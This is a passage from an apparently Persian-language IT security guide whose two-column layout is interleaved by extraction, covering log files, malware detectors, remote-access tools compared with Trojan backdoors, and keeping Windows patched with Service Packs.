‫ﻣﺴﺌﻮﻟﻴﻦ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺳﻴﺴﺘﻤﻬﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ‬ ‫•‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﺧﺪﺍﺩﻫﺎ ﺍﺑﺰﺍﺭ ﻣﻨﺎﺳﺒﻲ ﻫﺴﺘﻨﺪ ﻛـﻪ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﺔ‬
‫ﭼﻨﺪﻳﻦ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﺑﻪ ﺁﺳﺎﻧﻲ ﻣﺪﻳﺮﻳﺖ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﻻ ﺯﻳـﺎﺩ ﻣـﻮﺭﺩ ﺗﻮﺟـﻪ ﻗـﺮﺍﺭ‬ ‫ﺷﻤﺎ ﺭﺍ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨﻨﺪ ﺍﻣـﺎ ﻣﻌﻤـﻮ ﹰ‬
‫ﻧﻤﻲﮔﻴﺮﻧﺪ‪ .‬ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﻭﻱ ﺩﻳﺴﻚ ﻗﺮﺍﺭ ﺩﺍﺭﻧـﺪ ﻭ ﺑﺮﻧﺎﻣـﻪﻫـﺎ‬ ‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﻴﻦ ﻧﻴﺰ‬
‫ﻻ ﭘﻴـﺎﻡ ﻫﻨﮕـﺎﻣﻲ ﻧﻮﺷـﺘﻪ‬ ‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺁﻥ ﭘﻴﺎﻡ ﺑﻨﻮﻳﺴﻨﺪ‪ .‬ﻣﻌﻤـﻮ ﹰ‬ ‫ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺗﻤـﺎﻣﻲ ﻣـﻮﺍﺭﺩ ﺫﻛـﺮ ﺷـﺪﻩ ﺭﺍ ﺍﻧﺠـﺎﻡ‬
‫ﻣﻲﺷﻮﺩ ﻛﻪ ﻳﻚ ﺍﺗﻔﺎﻕ ﺭﺥ ﻣﻲﺩﻫﺪ ﻳﺎ ﺍﺷﻜﺎﻟﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ‪.‬‬ ‫ﺩﻫﻨــﺪ‪ .‬ﺩﺭ ﺣﻘﻴﻘــﺖ ﻣﻴــﺎﻥ ﺍﺑﺰﺍﺭﻫــﺎﻱ ﺩﺳﺘﺮﺳــﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺩﺭ‬
‫ﻛﺎﺭﺑﺮﺩﻫــﺎﻱ ﻣــﺬﻛﻮﺭ )ﻣﺎﻧﻨــﺪ ‪ (pcAnywhere‬ﻭ ﺩﺭﺑﻬــﺎﻱ ﻣﺨﻔــﻲ‬
‫ﻗﺎﻧﻮﻥ ﺑﻴﺴﺖ ﻭ ﭘﻨﺠﻢ‪:‬‬ ‫ﺗﺮﺍﻭﺍﻫﺎ )ﻣﺜﻞ ‪ Back Orifice‬ﻳﺎ ‪ (NetBus‬ﺗﻔﺎﻭﺕ ﻋﻤﻠﻜﺮﺩ ﭼﻨـﺪﺍﻧﻲ‬
‫ﻗﺎﺑﻠﻴﺖ ﺛﺒﺖ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺗﻮﺍﺑﻊ ﺳﻴﺴﺘﻢ ﻭ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ‬ ‫ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪.‬‬
‫ﻛﺎﺭﺑﺮﺩﻱ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﻓﻌﺎﻝ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺁﺷﻜﺎﺭﮔﺮﻫﺎﻱ ﺑﺪﺍﻓﺰﺍﺭﻫﺎ‬
‫ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺯ ﻭﻗﺎﻳﻌﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺛﺒﺖ ﺷﻮﻧﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫ﻓﺮﺽ ﻛﻨﻴﻢ ﺷﻤﺎ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﻮﺩ ﺭﺍ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻭﻳﺮﻭﺱ‬
‫ﺭﺍﻳﺎﻧﻪ ﺭﻭﺷﻦ ﺷﺪ؛‬ ‫•‬
‫ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﺩﺭﻳﺎﻓﺘﻲ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣـﻲﺩﻫﻴـﺪ‪ ،‬ﺍﺯ ﻧﺎﻣﻬـﺎﻱ‬
‫ﺷﺨﺼﻲ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﺪ؛‬ ‫•‬ ‫ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﺴﺘﺤﻜﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﻧﻤﺎﻳﻴـﺪ ﻭ ﻳـﻚ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٩٨‬‬

‫ﺷﺨﺼﻲ ﺳﻌﻲ ﺩﺍﺷﺖ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﻮﺩ ﺍﻣـﺎ ﺭﻣـﺰ ﻋﺒـﻮﺭ‬ ‫•‬
‫ﻭﻱ ﺍﺷﺘﺒﺎﻩ ﺑﻮﺩ؛‬
‫ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭﻳﺎﻓﺖ ﺷﺪ؛‬ ‫•‬

‫ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣـﻲﺧﻮﺍﺳـﺖ ﻓﺮﺳـﺘﺎﺩﻩ ﺷـﻮﺩ ﺍﻣـﺎ‬ ‫•‬


‫ﺍﺭﺗﺒﺎﻁ ﻗﻄﻊ ﺷﺪ؛‬
‫ﺧﻄﺎﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺭﻭﻱ ﺩﻳﺴﻚ )ﻳﺎ ﺍﺭﺗﺒﺎﻁ ﺷـﺒﻜﻪﺍﻱ( ﭘـﻴﺶ‬ ‫•‬
‫ﺁﻣﺪ؛‬
‫ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻳﻚ ﺍﺭﺗﺒـﺎﻁ ﻏﻴﺮﻣﺠـﺎﺯ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻭ ﺁﻧـﺮﺍ‬ ‫•‬
‫ﻣﺴﺪﻭﺩ ﻛﺮﺩ؛‬
‫ﺟﺴﺘﺠﻮﮔﺮ ﻭﻳﺮﻭﺱ ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﻣﺠﻤﻮﻋـﺔ ﺟﺪﻳـﺪﻱ ﺍﺯ‬ ‫•‬
‫ﻧﺸﺎﻧﻬﺎﻱ ﻭﻳﺮﻭﺱ ﺭﺍ ‪ download‬ﻧﻤﻮﺩ؛‬
‫ﻳﻚ ﻭﻳﺮﻭﺱﻳﺎﺏ ﺗﻤﺎﻣﻲ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻮﺟـﻮﺩ ﺩﺭ ﺳﻴـﺴﺘﻢ ﺭﺍ‬ ‫•‬
‫ﺑﺮﺭﺳﻲ ﻭ ﻳﻚ ﻭﻳﺮﻭﺱ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﺮﺩ‪.‬‬
‫ﺑﺴﺘﻪ ﺑﻪ ﺑﺮﻧﺎﻣﻪ ﻭ ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﺭﻭﻱ ﺁﻥ ﺍﺟﺮﺍ ﻣـﻲﺷـﻮﺩ‪،‬‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺑﻌﺪ ﺍﺯ ﺯﻳﺎﺩ ﺷـﺪﻥ ﺣﺠﻤـﺸﺎﻥ ﭘـﺎﻙ‬
‫ﺷﻮﻧﺪ‪ ،‬ﻳﺎ ﺍﻳﻨﻜﻪ ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ ﻓﺎﻳﻞ ﺛﺒﺖ ﺟﺪﻳـﺪﻱ ﺍﻳﺠـﺎﺩ‬
‫ﮔﺮﺩﺩ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﻗﺪﻳﻤﻲﺗﺮ ﺑـﺮﺍﻱ ﺑﺮﺭﺳـﻴﻬﺎﻱ ﺑﻌـﺪﻱ ﻫﻤﭽﻨـﺎﻥ‬
‫ﺣﻔﻆ ﺷﻮﻧﺪ )ﻋﻤﺪﺗﹰﺎ ﺩﺭ ﻗﺴﻤﺘﻲ ﺍﺯ ﻧﺎﻡ ﻓﺎﻳﻠﻬـﺎﻱ ﺛﺒـﺖ ﻳـﻚ ﺗـﺎﺭﻳﺦ ﻭﺟـﻮﺩ‬
‫ﺩﺍﺭﺩ(‪.‬‬
‫ﺑﻄﻮﺭ ﻛﻠﻲ ﺑﺮﺍﻱ ﻫﺮ ﺳﻴﺴﺘﻢ ﻭ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﻛـﺎﺭﺑﺮﺩﻱ ﻳـﻚ ﻓﺎﻳـﻞ‬
‫ﺛﺒﺖ ﻣﺠﺰﺍ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻳـﻦ ﻓﺎﻳـﻞ ﺭﺍ ﺑـﺎ‬
‫ﻳﻚ ﻭﻳﺮﺍﻳﺸﮕﺮ ﻣـﺘﻦ ﺑﺨﻮﺍﻧﻴـﺪ ﻭ ﮔـﺎﻫﻲ ﻧﻴـﺰ ﺑـﺮﺍﻱ ﺧﻮﺍﻧـﺪﻥ ﻭ‬
‫ﻗﺎﻟﺐﺑﻨﺪﻱ ﻓﺎﻳﻠﻬﺎ ﺑﻪ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺧﺎﺻﻲ ﻧﻴﺎﺯ ﺧﻮﺍﻫﻴﺪ ﺩﺍﺷﺖ‪.‬‬
‫ﺛﺒﺘﻬﺎ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ ﻫﺴﺘﻨﺪ ﻭ ﺑﻄﻮﺭ ﻛﻠﻲ ﺑﺎﻳﺪ ﻓﻌﺎﻝ ﺑﺎﺷﻨﺪ‪ .‬ﺩﺭ ﻋﻴﻦ‬
‫ﺣﺎﻝ ﺑﺎﻳﺪ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ ﺑـﺮﺍﻱ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺭﻭﺯﻣـﺮﻩ ﻭ‬
‫ﻋﺎﺩﻱ ﻓﻌﺎﻝ ﻧﻜﻨﻴﺪ؛ ﺯﻳﺮﺍ ﺳﻴﺴﺘﻢ ﺑﺎﻳﺪ ﻭﻗﺖ ﺯﻳﺎﺩﻱ ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ‬
‫ﺛﺒﺖ ﻭ ﺑﺮﺭﺳﻲ ﺁﻧﻬﺎ ﺻﺮﻑ ﻛﻨﺪ ﻭ ﺣﺠﻤﻲ ﺍﺯ ﺩﻳﺴﻚ ﻧﻴﺰ ﺗﻮﺳـﻂ‬
‫ﺁﻧﻬﺎ ﺍﺷﻐﺎﻝ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫ﺍﮔﺮ ﺑﺪﺍﻧﻴﺪ ﻛﻪ ﺍﻗﻼﻡ ﻣـﺸﺮﻭﺡ ﻓﺎﻳﻠﻬـﺎﻱ ﺛﺒـﺖ ﭼـﻪ ﭼﻴﺰﻫـﺎﻳﻲ ﺭﺍ‬
‫ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ ﺑﺎﻳﺪ ﺁﻧﻬﺎ ﺭﺍ ﺑﻄﻮﺭ ﺩﻭﺭﻩﺍﻱ ﻣﺮﻭﺭ ﻛﻨﻴﺪ ﺗـﺎ ﺑﺒﻴﻨﻴـﺪ‬
‫ﺁﻳﺎ ﺍﺗﻔﺎﻕ ﻏﻴﺮﻋﺎﺩﻱ ﺭﺥ ﺩﺍﺩﻩ ﻳﺎ ﺧﻴﺮ‪ .‬ﺩﺭ ﻏﻴﺮ ﺍﻳﻨﺼﻮﺭﺕ ﺛﺒﺘﻬﺎ ﺑﺎﻳﺪ‬
‫ﺑﮕﻮﻧــﻪﺍﻱ ﻧﮕﻬــﺪﺍﺭﻱ ﺷــﻮﻧﺪ ﻛــﻪ ﺩﺭﺻــﻮﺭﺕ ﻭﻗــﻮﻉ ﺍﺗﻔﺎﻗــﺎﺕ‬
‫ﻏﻴﺮﻃﺒﻴﻌﻲ ﺑﺘﻮﺍﻧﻨﺪ ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻛﺸﻒ ﺩﻗﻴﻘﺘﺮ ﺁﻧﭽـﻪ ﻛـﻪ‬
‫ﺭﺥ ﺩﺍﺩﻩ ﺑﺎﺷﻨﺪ‪.‬‬
‫‪٩٩‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﭼﻨﺪﻳﻦ ﺯﻳﺮﺳﻴﺴﺘﻢ ﻭ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ‬


‫ﺁﺳﻴﺐﭘﺬﻳﺮ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﺑﻪ ﺩﻟﻴﻞ ﻛﺜﺮﺕ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﻧﻴﺰ ﺗﻌﺪﺩ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ‪ ،‬ﺩﻫﻬﺎ ﻫﺰﺍﺭ ﺭﺍﻳﺎﻧﺔ ﺷﺨﺼﻲ ﻣﺒﺘﻨـﻲ ﺑـﺮ‬
‫‪ Windows‬ﺑﻪ ﺍﻫﺪﺍﻑ ﺍﺻﻠﻲ ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺴﺎﻧﻲ ﻛﻪ ﺑـﺪﺍﻓﺰﺍﺭﻫﺎﻳﻲ‬
‫ﻣﺜﻞ ﻭﻳﺮﻭﺱ‪ ،‬ﻛﺮﻡ ﻭ ﺗـﺮﻭﺍ ﻣﻨﺘـﺸﺮ ﻣـﻲﻛﺮﺩﻧـﺪ ﺗﺒـﺪﻳﻞ ﺷـﺪﻧﺪ‪.‬‬ ‫ﻓﺼﻞ ﻫﺸﺘﻢ‬
‫ﻭﺍﺳﻄﻬﺎﻱ ﮔﺮﺍﻓﻴﻜﻲ ﻛـﺎﺭﺑﺮ ﺩﺭ ‪ Windows‬ﺑـﺴﻴﺎﺭ ﻛﺎﺭﺑﺮﭘـﺴﻨﺪ‬
‫ﻫﺴﺘﻨﺪ ﻭ ﻫﻢﺍﻛﻨﻮﻥ ﻣﻴﻠﻴﻮﻧﻬﺎ ﻧﻔﺮ ﺑﺎ ﺩﺍﻧﺶ ﻓﻨـﻲ ﺍﻧـﺪﻙ ﺗﻮﺍﻧـﺎﻳﻲ‬
‫ﻧﻜﺎﺕ ﻭﻳﮋﺓ ﺑﺴﺘﺮﻫﺎﻱ ﻣﺨﺘﻠﻒ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﺩﺍﺭﻧﺪ‪ .‬ﺍﻳﻦ ﺭﻭﺵ ﻣﺒﺘﻨـﻲ ﺑـﺮ ﻛـﺎﺭﺑﺮ ﻭﻗﺘـﻲ ﺩﺭ‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﻛﻨﺎﺭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣﺬﻛﻮﺭ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨـﻲ‬ ‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻣﺒﺘﻨﻲ ﺑﺮ ‪Windows‬‬
‫ﺑﺮ ‪ Windows‬ﺭﺍ ﻣﺴﺘﻌﺪ ﺑﺮﻭﺯ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﻧﻘﺎﻁ ﻗﻮﺕ ﻭ ﻧﻘﺎﻁ ﺿﻌﻒ‬
‫ﭼﮕﻮﻧﻪ ﺍﺯ ﺧﻮﺩ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﻢ‬ ‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ Windows‬ﭘﺮﺩﺍﺯﻧـﺪﺓ ‪) Intel x86‬ﻳـﺎ ﻣﻌﺎﺩﻟﻬـﺎﻱ‬

‫ﺗﻤﺎﻣﻲ ﻣﻄﺎﻟﺐ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Windows‬ﻗﺎﺑﻞ‬ ‫ﺁﻥ( ﺭﺍﻳﺠﺘﺮﻳﻦ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺗﺎﻛﻨﻮﻥ ﻃﺮﺍﺣﻲ ﺷـﺪﻩ‬
‫ﺍﻋﻤﺎﻝ ﺍﺳﺖ ﻭ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﻧﮕﺮﺍﻥ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻫـﺴﺘﻨﺪ ﺑﺎﻳـﺪ‬ ‫ﺍﺳﺖ‪ .‬ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﻳﻦ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺁﻥ‬
‫ﺗﻤﺎﻡ ﺗﻮﺻﻴﻪﻫﺎﻱ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺭﺍ ﺟﺪﻱ ﺑﮕﻴﺮﻧﺪ‪.‬‬ ‫ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﻳﻚ ﻛـﺎﺭﺑﺮ ﺑـﺴﻴﺎﺭ ﺟـﺬﺍﺏ ﻫـﺴﺘﻨﺪ ﻭ ﺗﻌـﺪﺍﺩ ﺯﻳـﺎﺩﻱ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﺠﺎﺭﻱ‪ ،‬ﻧﺮﻡﺍﻓﺰﺍﺭ ‪ shareware‬ﻭ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺭﺍﻳﮕـﺎﻥ‬
‫ﺍﻧﺘﺸﺎﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ‬ ‫ﺑﺮﺍﻱ ﺁﻥ ﻣﻮﺟﻮﺩ ﺍﺳﺖ‪ .‬ﺍﮔﺮﭼﻪ ﻣﺸﺎﺑﻪ ﻫﺮ ﺳﻴﺴﺘﻢ ﺩﻳﮕﺮ ﺩﺭ ﺍﻳﻨﺠﺎ‬
‫ﺍﮔﺮ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﻛﺎﻓﻲ ﺩﺍﺭﻳـﺪ‪ ،‬ﺑـﺮﺍﻱ ﺑـﻪﺭﻭﺯ ﻧﮕـﻪﺩﺍﺷـﺘﻦ‬ ‫ﻫﻢ ﺍﻓﺮﺍﺩ ﻣﺘﺨﺼﺺ ﺑﻪ ﺳﺨﺘﻲ ﭘﻴﺪﺍ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﺍﻣـﺎ ﻣﺘﺨﺼـﺼﻴﻦ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺧﻮﺩ ﺑﺎ ﺁﺧﺮﻳﻦ ﻧﺴﺨﺔ ‪ServicePack‬ﻫـﺎ‬ ‫ﺯﻳﺎﺩﻱ ﺑﺎ ﺳﻄﺢ ﺩﺍﻧﺶ ﻗﺎﺑﻞ ﻗﺒﻮﻝ ﺑﺮﺍﻱ ﻛﺎﺭ ﺑـﺎ ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ‬
‫ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ‪ ١١٨‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ‪ .‬ﺩﺭ‬ ‫ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺭﻗﺒﺎﻱ ﺯﻳﺎﺩﻱ ﺩﺭ ﺑﻌﺪ ﺳﺨﺖﺍﻓﺰﺍﺭ ﺑـﺎ ﻫـﻢ‬
‫ﻏﻴﺮﺍﻳﻨــﺼﻮﺭﺕ ﻭﺻــﻠﻪﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﻣﻨﺘــﺸﺮﺷﺪﻩ ﺑــﺮﺍﻱ‬ ‫ﺭﻗﺎﺑﺖ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﺍﻳـﻦ ﺧـﻮﺩ ﺑﺎﻋـﺚ ﺗﻨـﻮﻉ ﻣﺤـﺼﻮﻻﺕ ﻭ‬
‫ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ‪ Windows‬ﺭﺍ ﺑﻜﺎﺭ ﺑﮕﻴﺮﻳﺪ )ﺍﻳـﻦ ﻭﺻـﻠﻪﻫـﺎ‬ ‫ﻗﻴﻤﺘﻬﺎﻱ ﻧﺴﺒﺘﹰﺎ ﭘﺎﻳﻴﻦ ﺁﻧﻬﺎ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﻧﺴﺒﺖ ﺑﻪ ‪Service Pack‬ﻫﺎ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﻛﻤﺘﺮﻱ ﺍﺷﻐﺎﻝ ﻣﻲﻛﻨﻨﺪ(‪.‬‬ ‫‪ Windows‬ﺍﺯ ﻧﻈﺮ ﺍﻣﻨﻴﺘـﻲ ﻭﺿـﻌﻴﺖ ﭼﻨـﺪﺍﻥ ﺟـﺎﻟﺒﻲ ﻧـﺪﺍﺭﺩ‪.‬‬
‫ﺍﮔــﺮ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﺍﺯ ﻃﺮﻳــﻖ ﭘﺎﻳﮕــﺎﻩ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ‬ ‫ﻫﺴﺘﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ‪ ١١٧‬ﺑﺎ ﻣﻼﺣﻈـﺔ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ ﺍﺭﺗﺒﺎﻃـﺎﺕ‬
‫ﻣﺎﻳﻜﺮﻭﺳــﺎﻓﺖ ﺑﺮﺍﻳﺘــﺎﻥ ﺍﻣﻜﺎﻧﭙــﺬﻳﺮ ﻧﻴــﺴﺖ ﻣــﻲﺗﻮﺍﻧﻴــﺪ‬ ‫ﺷﺒﻜﻪﺍﻱ ﻃﺮﺍﺣﻲ ﻧﺸﺪﻩ ﺑﻮﺩ ﻭ ﻫﺮﭼﻨﺪ ﺩﺭ ﻧﺴﺨﻪﻫﺎﻱ ﺟﺪﻳﺪﺗﺮ ﺁﻥ‬
‫ﺑــﺴﺘﻪﻫــﺎﻱ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﺭﺍ ﺍﺯ ﻣﺮﻛــﺰ ‪download‬‬ ‫)‪ Windows 2000‬ﻭ ‪ Windows XP‬ﻭ‪ (...‬ﺑﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ‬
‫ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ‪ ١١٩‬ﺩﺭﻳﺎﻓﺖ ﻛﻨﻴﺪ‪.‬‬ ‫ﭘﺮﺩﺍﺧﺘﻪ ﺷﺪﻩ‪ ،‬ﺍﻣﺎ ﻫﻨﻮﺯ ﺍﻳﻤﻨﻲ ﻻﺯﻡ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻭ ﺗﻐﻴﻴﺮﺍﺕ ﺍﺧﻴﺮ‬
‫ﺷﺎﻳﺪ ‪ ISP‬ﺷﻤﺎ ﻳﺎ ﺳﺎﻳﺮ ﻓﺮﺍﻫﻢﺁﻭﺭﻧﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺑﺘﻮﺍﻧﻨـﺪ‬ ‫ﺑﻪ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻗﺪﻳﻤﻲﺗـﺮ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﺮﺩﻧـﺪ‬
‫ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲﻫـﺎﻱ ﻣﻨﺘـﺸﺮﺷﺪﻩ ﺭﺍ ‪ download‬ﻭ ﺭﻭﻱ‬ ‫ﻛﻤﻚ ﺍﻧﺪﻛﻲ ﻧﻤﻮﺩﻩ ﺍﺳﺖ‪ .‬ﺗﺎ ﻫﻤﻴﻦ ﺍﻭﺍﺧﺮ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ ﺗﻮﺟـﻪ‬
‫ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﺗﻮﺯﻳﻊ ﻛﻨﻨﺪ‪ .‬ﺍﮔﺮﭼﻪ ﻣﻨـﺎﺑﻊ ﻗﺎﺑـﻞﺗـﻮﺟﻬﻲ‬ ‫ﺯﻳﺎﺩﻱ ﺑﻪ ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﻧﺪﺍﺷﺖ‪ .‬ﺍﻟﺒﺘﻪ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺍﻳﻦ ﺷـﺮﺍﻳﻂ‬
‫ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﻳﻚ ﺍﺑﺰﺍﺭ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ‬ ‫ﺗﻐﻴﻴﺮ ﻛﺮﺩﻩﺍﻧـﺪ‪ ،‬ﺑـﻮﻳﮋﻩ ﺁﻧﻜـﻪ ﺍﻳـﻦ ﺷـﺮﻛﺖ ﺗﻮﺟـﻪ ﺧـﻮﺩ ﺭﺍ ﺑـﻪ‬
‫ﺑﻪ ﺭﻭﺯﺭﺳـﺎﻧﻲ ‪ Windows‬ﺩﺭ ﻗﺎﻟـﺐ ﺧـﺪﻣﺎﺗﻲ ﺑـﻪ ﻧـﺎﻡ‬ ‫ﺍﺷــﻜﺎﻻﺕ ﻣﻮﺟــﻮﺩ ﺩﺭ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ﭼﻨﺪﺭﺳــﺎﻧﻪﺍﻱ ﻭ ﺩﻳﮕــﺮ‬
‫‪ Software Update Services‬ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ‬ ‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﺧﻮﺩ ﻣﻌﻄﻮﻑ ﺩﺍﺷﺘﻪ ﺍﺳﺖ‪.‬‬
